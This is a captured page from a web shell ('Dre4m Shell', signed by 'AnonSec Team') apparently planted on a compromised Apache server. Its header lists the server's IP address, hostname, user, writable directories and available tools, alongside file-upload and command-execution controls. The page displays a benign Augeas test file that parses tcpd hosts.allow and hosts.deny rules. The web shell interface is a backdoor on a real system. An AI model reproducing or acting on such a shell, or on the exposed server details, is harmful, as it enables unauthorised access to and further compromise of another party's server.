Dre4m Shell
Server IP : 85.214.239.14  /  Your IP : 3.138.179.120
Web Server : Apache/2.4.62 (Debian)
System : Linux h2886529.stratoserver.net 4.9.0 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.18
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /proc/3/root/usr/share/augeas/lenses/dist/tests/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /proc/3/root/usr/share/augeas/lenses/dist/tests/test_hosts_access.aug
module Test_Hosts_Access =

let multi_daemon = "sshd, sendmail : 10.234.\n"

test Hosts_Access.lns get multi_daemon =
  { "1"
    { "process" = "sshd" }
    { "process" = "sendmail" }
    { "client" = "10.234." }
  }

let multi_daemon_spc = "sshd sendmail : 10.234.\n"

test Hosts_Access.lns get multi_daemon_spc =
  { "1"
    { "process" = "sshd" }
    { "process" = "sendmail" }
    { "client" = "10.234." }
  }

let multi_client = "sshd: 10.234. , 192.168.\n"

test Hosts_Access.lns get multi_client =
  { "1"
    { "process" = "sshd" }
    { "client" = "10.234." }
    { "client" = "192.168." }
  }

let multi_client_spc = "sshd: 10.234. 192.168.\n"

test Hosts_Access.lns get multi_client_spc =
  { "1"
    { "process" = "sshd" }
    { "client" = "10.234." }
    { "client" = "192.168." }
  }

let daemon_except = "ALL Except sshd : 10.234.\n"

test Hosts_Access.lns get daemon_except =
  { "1"
    { "process" = "ALL" }
    { "except"
      { "process" = "sshd" }
    }
    { "client" = "10.234." }
  }

let client_except = "sshd : ALL EXCEPT 192.168\n"

test Hosts_Access.lns get client_except =
  { "1"
    { "process" = "sshd" }
    { "client" = "ALL" }
    { "except"
      { "client" = "192.168" }
    }
  }

let daemon_host = "sshd@192.168.0.1: 10.234.\n"

test Hosts_Access.lns get daemon_host =
  { "1"
    { "process" = "sshd"
      { "host" = "192.168.0.1" }
    }
    { "client" = "10.234." }
  }

let user_client = "sshd: root@.example.tld\n"

test Hosts_Access.lns get user_client =
  { "1"
    { "process" = "sshd" }
    { "client" = ".example.tld"
      { "user" = "root" }
    }
  }

let shell_command = "sshd: 192.168. : /usr/bin/my_cmd -t -f some_arg\n"

test Hosts_Access.lns get shell_command =
  { "1"
    { "process" = "sshd" }
    { "client" = "192.168." }
    { "shell_command" = "/usr/bin/my_cmd -t -f some_arg" }
  }

let client_netgroup = "sshd: @hostgroup\n"
test Hosts_Access.lns get client_netgroup =
  { "1"
    { "process" = "sshd" }
    { "client" = "@hostgroup" }
  }

let client_netmask = "sshd: 192.168.0.0/255.255.0.0\n"
test Hosts_Access.lns get client_netmask =
  { "1"
    { "process" = "sshd" }
    { "client" = "192.168.0.0"
      { "netmask" = "255.255.0.0" } }
  }

let client_cidr_v4 = "sshd: 192.168.0.0/24\n"
test Hosts_Access.lns get client_cidr_v4 =
  { "1"
    { "process" = "sshd" }
    { "client" = "192.168.0.0"
      { "netmask" = "24" } }
  }

let client_cidr_v6 = "sshd: [fe80::%fxp0]/64\n"
test Hosts_Access.lns get client_cidr_v6 =
  { "1"
    { "process" = "sshd" }
    { "client" = "[fe80::%fxp0]"
      { "netmask" = "64" } }
  }

let client_file = "sshd: /etc/external_file\n"
test Hosts_Access.lns get client_file =
  { "1"
    { "process" = "sshd" }
    { "file" = "/etc/external_file" }
  }

let client_wildcard = "sshd: 192.168.?.*\n"
test Hosts_Access.lns get client_wildcard =
  { "1"
    { "process" = "sshd" }
    { "client" = "192.168.?.*" }
  }

let sample_hosts_allow = "# hosts.allow	This file describes the names of the hosts which are
#		allowed to use the local INET services, as decided
#		by the '/usr/sbin/tcpd' server.
in.telnetd:	192.168.1.
sshd:		70.16., 207.228.
ipop3d:		ALL
sendmail:	ALL
"

test Hosts_Access.lns get sample_hosts_allow =
  { "#comment" = "hosts.allow	This file describes the names of the hosts which are" }
  { "#comment" = "allowed to use the local INET services, as decided" }
  { "#comment" = "by the '/usr/sbin/tcpd' server." }
  { "1"
    { "process" = "in.telnetd" }
    { "client" = "192.168.1." }
  }
  { "2"
    { "process" = "sshd" }
    { "client" = "70.16." }
    { "client" = "207.228." }
  }
  { "3"
    { "process" = "ipop3d" }
    { "client" = "ALL" }
  }
  { "4"
    { "process" = "sendmail" }
    { "client" = "ALL" }
  }


let sample_hosts_deny = "#
# hosts.deny	This file describes the names of the hosts which are
#		*not* allowed to use the local INET services, as decided
#		by the '/usr/sbin/tcpd' server.
in.telnetd: all

sshd: 61., 62., \
 64.179., 65.
"

test Hosts_Access.lns get sample_hosts_deny =
  {  }
  { "#comment" = "hosts.deny	This file describes the names of the hosts which are" }
  { "#comment" = "*not* allowed to use the local INET services, as decided" }
  { "#comment" = "by the '/usr/sbin/tcpd' server." }
  { "1"
    { "process" = "in.telnetd" }
    { "client" = "all" }
  }
  {  }
  { "2"
    { "process" = "sshd" }
    { "client" = "61." }
    { "client" = "62." }
    { "client" = "64.179." }
    { "client" = "65." }
  }


let ip_mask = "sshd: 61./255.255.255.255\n"

test Hosts_Access.lns get ip_mask =
  { "1"
    { "process" = "sshd" }
    { "client" = "61." { "netmask" = "255.255.255.255" } } }

(* Support options from hosts_options(5) *)
test Hosts_Access.lns get "sshd: all: keepalive\n" =
  { "1"
    { "process" = "sshd" }
    { "client" = "all" }
    { "keepalive" } }

test Hosts_Access.lns get "sshd: all: severity mail.info\n" =
  { "1"
    { "process" = "sshd" }
    { "client" = "all" }
    { "severity" = "mail.info" } }

test Hosts_Access.lns get "sshd: all: severity mail.info : rfc931 5 : DENY\n" =
  { "1"
    { "process" = "sshd" }
    { "client" = "all" }
    { "severity" = "mail.info" }
    { "rfc931" = "5" }
    { "DENY" } }

(* Ticket #255, from FreeBSD *)
let host_options_cmds = "# You need to be clever with finger; do _not_ backfinger!! You can easily
# start a \"finger war\".
fingerd : ALL \
        : spawn (echo Finger. | \
         /usr/bin/mail -s \"tcpd\: %u@%h[%a] fingered me!\" root) & \
        : deny

# The rest of the daemons are protected.
ALL : ALL : \
          severity auth.info \
        : twist /bin/echo \"You are not welcome to use %d from %h.\"
"

test Hosts_Access.lns get host_options_cmds = 
  { "#comment" = "You need to be clever with finger; do _not_ backfinger!! You can easily" }
  { "#comment" = "start a \"finger war\"." }
  { "1"
    { "process" = "fingerd" }
    { "client" = "ALL" }
    { "spawn" = "(echo Finger. | \
         /usr/bin/mail -s \"tcpd\\: %u@%h[%a] fingered me!\" root) &" }
    { "deny" } }
  {  }
  { "#comment" = "The rest of the daemons are protected." }
  { "2"
    { "process" = "ALL" }
    { "client" = "ALL" }
    { "severity" = "auth.info" }
    { "twist" = "/bin/echo \"You are not welcome to use %d from %h.\"" } }

Anon7 - 2022
AnonSec Team